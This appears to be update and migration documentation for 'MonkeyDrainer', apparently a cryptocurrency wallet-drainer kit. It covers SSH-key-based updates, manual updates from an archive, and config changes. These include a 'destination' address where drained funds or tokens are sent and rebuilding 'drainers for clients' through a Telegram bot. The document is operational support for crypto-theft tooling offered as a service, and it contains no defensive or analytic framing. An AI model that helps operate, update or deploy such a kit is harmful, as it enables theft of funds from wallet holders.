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MonkeyDrainer Update

Option 1: Automatic Update

MonkeyDrainer supports automatic updates, which requires configuring UpdateKeys (special SSH keys). These keys allow your server to receive updates directly from the private repository, ensuring you are always using the latest version without needing to manually download archives.

Steps to set up automatic updates:

  1. Generating UpdateKeys:

    • Keys are generated automatically. Simply run the script and select 9Generate UpdateKeys in the menu.
    • Public keys will be generated and displayed on the screen.
  2. Send the public keys to the developer:

    • Why is this necessary? The public keys are needed by the developer to add them to the whitelist, which will allow your server to receive updates directly from the private MonkeyDrainer repositories.
    • After generating the keys, you need to send the public keys to the developer.
  3. How does it work?

    • Once the developer adds your keys to the whitelist, you will be able to update the project and add-ons directly using the script functions.
    • The system automatically checks for updates each time you run the script.
  4. Running the update script:

    • Run the script:
    • The script will automatically check for updates for both the main project and the add-on:
      [FusionRunner] Checking updates for MonkeyDrainer...
      [FusionRunner] Main repository has updates available.
      [FusionRunner] Checking for FusionHoneypotAddon updates...
      [FusionRunner] Addon repository is up-to-date.
  5. Updating the project:

    • In the menu, select 8Sync updates drainer & addon. The script will automatically:
      • Download the latest updates from the main and add-on repositories.
      • Rebuild Docker containers.
      • Restart all services with the updates.

Option 2: Manual Update Using a ZIP Archive

If for any reason you don't want to use automatic updates via GitHub, or you don't have internet access, you can manually update the project using a ZIP archive.

Steps for manual update:

  1. Download and unpack the archive: Download the update archive to the server and unpack it:

    unzip /path/to/
  2. Move files from the fusion-drainer-main folder: After unpacking, ensure that all files are in the fusion-drainer-main folder. Move the contents of this folder to your project directory:

    rsync -av --remove-source-files fusion-drainer-main/ /path/to/fusion-drainer/
  3. Run the rebuild through Go to the project directory and run the script to rebuild the containers:

    cd /path/to/fusion-drainer
  4. Select the rebuild option: In the menu, select 7Rebuild project. The script will rebuild and restart all containers.

  5. Check the status of the containers: Select 5Check container status in the menu to ensure that all containers are running correctly.

MonkeyDrainer Migration

Migration to 1.6.1
  1. Add a new destination parameter to the ton section of the config.yaml file. This is the address where the funds or tokens will be sent:

      destination: "UQ..."
  2. Rebuild all drainers for clients through the Telegram bot. Select "⚒️ Build Drainer" for each build.

Migrating to 1.5.9-beta
  1. Remove the honeypot section from the config.yaml file.
  2. Remove all mentions of decimals from the configuration and integration. Parameters related to manually setting decimals are no longer needed — the script now handles this automatically.
  3. Add the new mnemonic parameter in the ton section for working with private keys and smart contracts:
      mnemonic: "your mnemonic phrase"
  4. Rebuild all drainers for clients via the Telegram bot. Select "⚒️ Build Drainer" for each build.